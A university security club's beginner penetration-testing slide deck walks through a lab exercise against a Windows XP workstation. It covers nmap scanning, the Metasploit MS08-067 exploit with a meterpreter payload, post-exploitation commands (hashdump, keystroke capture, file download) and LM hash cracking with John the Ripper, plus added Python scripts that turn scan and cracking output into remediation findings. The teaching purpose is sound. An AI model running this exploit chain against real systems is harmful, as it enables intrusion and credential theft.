Penetration Testing 101 (Boot-camp) Computer Security Group Mitchell Adair utdcsg.org

Page 1

Penetration Testing 101

(Boot-camp)

Computer Security Group
Mitchell Adair

utdcsg.org

Page 2

Outline

"Interactive" meeting
Introduction to Backtrack
A mini penetration test
  Scenario
  Methodology
    Enumeration, Exploitation, Post Exploitation
  Exercise
Summary
Resources

Page 3

Scenario

Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations.

You take it back to the lab and begin to test it...

Page 4

Outline

Enumeration
  OS, services, versions, filters

Exploitation
  Match a service + version to a known vulnerability
  Exploit, getting shell access to the box

Post Exploitation
  Shell is just the beginning... ;)
  Hashes, SSH / GPG keys, pivot, …

Page 5

Enumeration

'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org

nmap [Scan Type(s)] [Options] {target specification}

Scan Types
  -sS, SYN
  -sT, Connect
  -sA, ACK
  …

Options
  -O, OS
  -sV, services
  -v, verbose
  …

Page 6

… Enumeration

nmap 192.168.1.1
  Default scan, full SYN, top 1000 ports

nmap -v -sV -O 192.168.1.1 -p 1-65535
  Verbose, services, OS, ports 1 through 65535

nmap -PN --script=smb* -sV -O 192.168.1.1
  Don't ping, run all smb* scripts, service, OS

Page 7

Nmap Output

Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
...
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
...
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S-1-5-21-606747145-1647877149-725345543
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
...
|   Anonymous shares: IPC$
|_  Restricted shares: ADMIN$, C$
...
| smb-check-vulns:
|_  MS08-067: VULNERABLE
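As an added example (not part of the slides), a small Python triage script that parses nmap normal output like the listing above and turns what it finds into remediation items for the workstation build; the sample text is constructed from the slide, and the regexes assume nmap's normal-output column layout.

```python
import re

# Constructed sample in nmap's normal-output format, modelled on the scan
# result shown on the slide above (same ports, OS guess and script output).
SAMPLE_SCAN = """\
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\\winnt\\system32\\Mstask.exe)
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Host script results:
| smb-os-discovery: Windows 2000
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
VULN_RE = re.compile(r"^\|_?\s+(MS\d{2}-\d{3}):\s+(\w+)")

def parse_nmap(text):
    """Pull ports, the OS guess and smb-check-vulns verdicts out of nmap text."""
    report = {"ports": [], "os": None, "vulns": {}}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            report["ports"].append({"port": int(m[1]), "proto": m[2], "state": m[3],
                                    "service": m[4], "version": m[5].strip()})
        elif line.startswith("OS details:"):
            report["os"] = line.split(":", 1)[1].strip()
        elif (m := VULN_RE.match(line)):
            report["vulns"][m[1]] = m[2]
    return report

def triage(report):
    """Turn the parsed scan into remediation findings for the workstation build."""
    findings = []
    for ms_id, verdict in report["vulns"].items():
        if verdict.upper() == "VULNERABLE":
            findings.append(f"apply {ms_id}: smb-check-vulns reports VULNERABLE")
    if any(p["state"] == "open" and p["port"] in (139, 445) for p in report["ports"]):
        findings.append("SMB (139/445) reachable: host firewall should block it from untrusted segments")
    if report["os"] and any(x in report["os"] for x in ("Windows 2000", "Windows XP")):
        findings.append("end-of-life OS fingerprint: " + report["os"])
    return findings
```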

Page 8

Exploitation

Metasploit – Penetration Testing Framework: tools, libraries, modules, and user interfaces

# msfconsole
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

Page 9

Post Exploitation

Gather useful information
  SSH & GPG keys, hashes, etc...
Meterpreter "post" modules
Pivot

meterpreter > hashdump
  sysinfo
  keyscan_(start | stop | dump)
  download
  migrate
  shell

Page 10

… Post Exploitation

We dumped the hashes... now what?
  Pass the hash
  Crack the hash

John the Ripper
  a tool to find weak passwords of your users

john [options] password-files
  --wordlist
  --users, --groups
  --session, --restore

Page 11

… Post Exploitation

john --wordlist=/.../password.lst /tmp/hashes.txt

Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU
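An added example, not from the slides: a Python script that parses john's result lines like those above, rejoins the two LM halves (webmaster:1 / webmaster:2) into the full password, and writes the findings a defender would hand back to the account owners; the input is constructed from the slide and the function names are my own.

```python
import re

# Constructed lines in john's result format, modelled on the slide's listing:
# "ABC123 (sally)", "BASKETB (webmaster:1)", "ALL (webmaster:2)", and so on.
JOHN_RESULTS = """\
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
"""

# password, then "(user)" or "(user:1)" / "(user:2)" for the two LM halves
LINE_RE = re.compile(r"^(.*?)\s+\((\w+)(?::([12]))?\)\s*$")

def parse_john(text):
    """Return (user -> password, set of users whose LM halves were seen).
    LM hashes each 7-character half of the uppercased password separately,
    so john reports them as user:1 and user:2; they are rejoined here."""
    passwords, halves, lm_users = {}, {}, set()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pw, user, half = m[1], m[2], m[3]
        if half is None:
            passwords[user] = pw
        else:
            halves.setdefault(user, ["", ""])[int(half) - 1] = pw
            lm_users.add(user)
    for user, (h1, h2) in halves.items():
        passwords[user] = h1 + h2
    return passwords, lm_users

def audit(passwords, lm_users):
    """Findings for the workstation build: one per account plus a policy item."""
    findings = []
    for user, pw in sorted(passwords.items()):
        if pw == "":
            findings.append(f"{user}: blank password; disable the account or set one")
        else:
            findings.append(f"{user}: password recovered from a wordlist; force a reset")
    if lm_users:
        # LM storage is a host policy setting ("Do not store LAN Manager hash value")
        findings.append("LM hashes are still stored (recovered case-insensitively for: "
                        + ", ".join(sorted(lm_users)) + "); disable LM hash storage")
    return findings
```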

Page 12

So... let's get started

Boot up to your Backtrack CD
  passwd
  /etc/init.d/networking start
  startx
Follow along... let's pwn this box :)

Page 13

Summary

Clearly... Company X's default user workstations need some work.

Now let's do the paperwork!... just kidding ;)

Hopefully this gives everyone a hands-on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!

Page 14

Resources

utdcsg.org
  Presentations, articles, resources, etc.
  IRC - irc.oftc.net, #utdcsg

Nmap - nmap.org/5/
Metasploit - metasploit.com/
John the Ripper - openwall.com/john/